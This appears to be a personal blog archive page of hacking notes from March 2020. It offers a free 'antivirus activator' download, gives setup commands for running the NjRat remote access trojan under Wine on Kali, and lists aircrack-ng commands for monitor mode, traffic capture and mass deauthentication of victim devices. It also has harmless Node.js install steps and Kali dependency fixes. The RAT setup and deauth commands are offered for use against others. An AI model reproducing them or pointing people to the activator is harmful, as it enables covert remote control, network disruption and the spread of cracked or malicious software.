Posts

Showing posts from March, 2020

Download Antivirus activator for all Antivirus software for free

Checkout this antivirus activator for any antivirus programs you have. Click here to download for free.

Setting Up and Using NjRat on Kali

Setting Up Environment sudo dpkg --add-architecture i386 sudo apt install wine32 sudo wget http://www.kegel.com/wine/winetricks sudo chmod +x winetricks sudo mv winetricks /usr/bin/ sudo apt update WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot WINEPREFIX=~/.wine32 WINEARCH=win32 winetricks dotnet32 sudo apt install mono-complete WINEPREFIX=~/.wine32 WINEARCH=win32 wine /path/njRat/njRat.exe
NETWORK HACKING ifconfig wlan0 hw ether (mac)(changing mac address) Checking for interface mode(master,manage,monitor) iwconfig Putting interface down ifconfig wlan0 down Killing interfering processes airmon-ng check kill Changing interface to Monitor mode airmon-ng start wlan0(wlan0mon) iwconfig wlan0 mode monitor(mon0) Bringing interface up ifconfig wlan0 up Listing broadcast devices(2.4 and 5 Gigahertz) airodump-ng (interface in monitor mode) airondump-ng --band -a (monitor mode) Listening on specific device airodump-ng --bssid (mac) --channel (number) --write test (interface in monitor mode) airondump-ng --band -a --bssid (mac) --channel (number) --write test (monitor mode) Deauthentication Attack Specicic device connected to wireless device aireplay-ng --deauth 10000000 -a (router mac) -c (victim mac) (monitor mode) Multiple devices deauth aireplay-ng --deauth 10000000 -a (router mac) -c (victim mac) (monitor mode) &>/dev/null & aireplay-ng --deauth 10000000...
Instaling Node-js Summary The next time that you want to install Node.js on your computer, just execute the commands without following the entire tutorial: # Verify that you have all required tools sudo apt-get install python g++ make checkinstall fakeroot # Create tmp dir and switch to it src=$(mktemp -d) && cd $src # Download the latest version of Node wget -N http://nodejs.org/dist/node-latest.tar.gz # Extract the content of the tar file tar xzvf node-latest.tar.gz && cd node-v* # Run configuration ./configure # Create .deb for Node sudo fakeroot checkinstall -y --install=no --pkgversion $(echo $(pwd) | sed -n -re's/.+node-v(.+)$/\1/p') make -j$(($(nproc)+1)) install # Replace [node_*] with the name of the generated .deb package of the previous step sudo dpkg -i node_*
Install missing dependencies: apt install apktool beef-xss lib32stdc++6 lib32z1 lib32z1-dev zipalign android-tools-adb android-tools-fastboot dex2jar zaproxy armitage python-pip jadx jd-gui apksigner bettercap python-dnspython hostapd-wpe terminator metagoofil wine android-sdk -y How to Fix Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Type in the terminal: _SILENT_JAVA_OPTIONS="$_JAVA_OPTIONS" unset _JAVA_OPTIONS alias='java "$_SILENT_JAVA_OPTIONS"' Missing Firmware for Kali Solving '/r command not found in current directory for i in *;do if [[ -f $i ]]; then sed -i 's/\r$//' "$i"; fi; done For a file, do dos2unix filename